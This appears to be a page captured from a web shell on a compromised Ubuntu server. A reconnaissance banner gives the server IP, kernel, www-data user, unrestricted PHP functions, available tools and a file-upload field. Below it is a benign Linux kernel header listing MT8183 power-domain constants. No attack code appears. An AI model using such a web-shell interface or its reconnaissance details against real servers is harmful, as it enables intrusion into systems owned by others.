Server IP : 15.235.198.142 / Your IP : 216.73.216.149 Web Server : Apache/2.4.58 (Ubuntu) System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64 User : www-data ( 33) PHP Version : 8.3.6 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/lib/modules/6.8.0-45-generic/build/include/dt-bindings/power/ |
Upload File : |
/* SPDX-License-Identifier: GPL-2.0 */ /* * Copyright (c) 2020 MediaTek Inc. * Author: Weiyi Lu <weiyi.lu@mediatek.com> */ #ifndef _DT_BINDINGS_POWER_MT8183_POWER_H #define _DT_BINDINGS_POWER_MT8183_POWER_H #define MT8183_POWER_DOMAIN_AUDIO 0 #define MT8183_POWER_DOMAIN_CONN 1 #define MT8183_POWER_DOMAIN_MFG_ASYNC 2 #define MT8183_POWER_DOMAIN_MFG 3 #define MT8183_POWER_DOMAIN_MFG_CORE0 4 #define MT8183_POWER_DOMAIN_MFG_CORE1 5 #define MT8183_POWER_DOMAIN_MFG_2D 6 #define MT8183_POWER_DOMAIN_DISP 7 #define MT8183_POWER_DOMAIN_CAM 8 #define MT8183_POWER_DOMAIN_ISP 9 #define MT8183_POWER_DOMAIN_VDEC 10 #define MT8183_POWER_DOMAIN_VENC 11 #define MT8183_POWER_DOMAIN_VPU_TOP 12 #define MT8183_POWER_DOMAIN_VPU_CORE0 13 #define MT8183_POWER_DOMAIN_VPU_CORE1 14 #endif /* _DT_BINDINGS_POWER_MT8183_POWER_H */